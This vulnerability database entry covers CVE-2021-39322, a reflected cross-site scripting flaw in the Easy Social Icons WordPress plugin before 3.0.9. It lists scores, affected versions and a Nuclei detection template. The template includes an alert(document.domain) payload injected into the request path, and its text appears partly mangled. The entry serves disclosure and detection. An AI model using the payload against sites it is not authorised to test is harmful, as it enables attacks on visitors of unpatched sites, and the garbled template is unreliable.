CVE-2021-39322
Published 2021-09-02
Priority P3 38 · medium · 6.1 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Exploit
EPSS: 2.36% (81.6th percentile)
The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cybernetikz | easy_social_icons | < 3.0.9 | 3.0.9 |
| cybernetikz | easy_social_icons | 3.0.8 – 3.0.8 | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
No detection rules found.
Nuclei
CVE-2021-39322 [MEDIUM] WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting (nuclei · CVSS 6.1)

```yaml
WordPress Easy Social Icons Plugin alert(document.domain)/?page=cnss_social_icon_page HTTP/1.1
Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'alert(document.domain)'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dccc70f11c9b5b15ab5507ddd6a9decee04c0b492dedaf69b57e7fb8daf384a30220532b3caa34e9c13d75d2de425fac03ad43609d46c67cf40305496ca20ef78f40:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.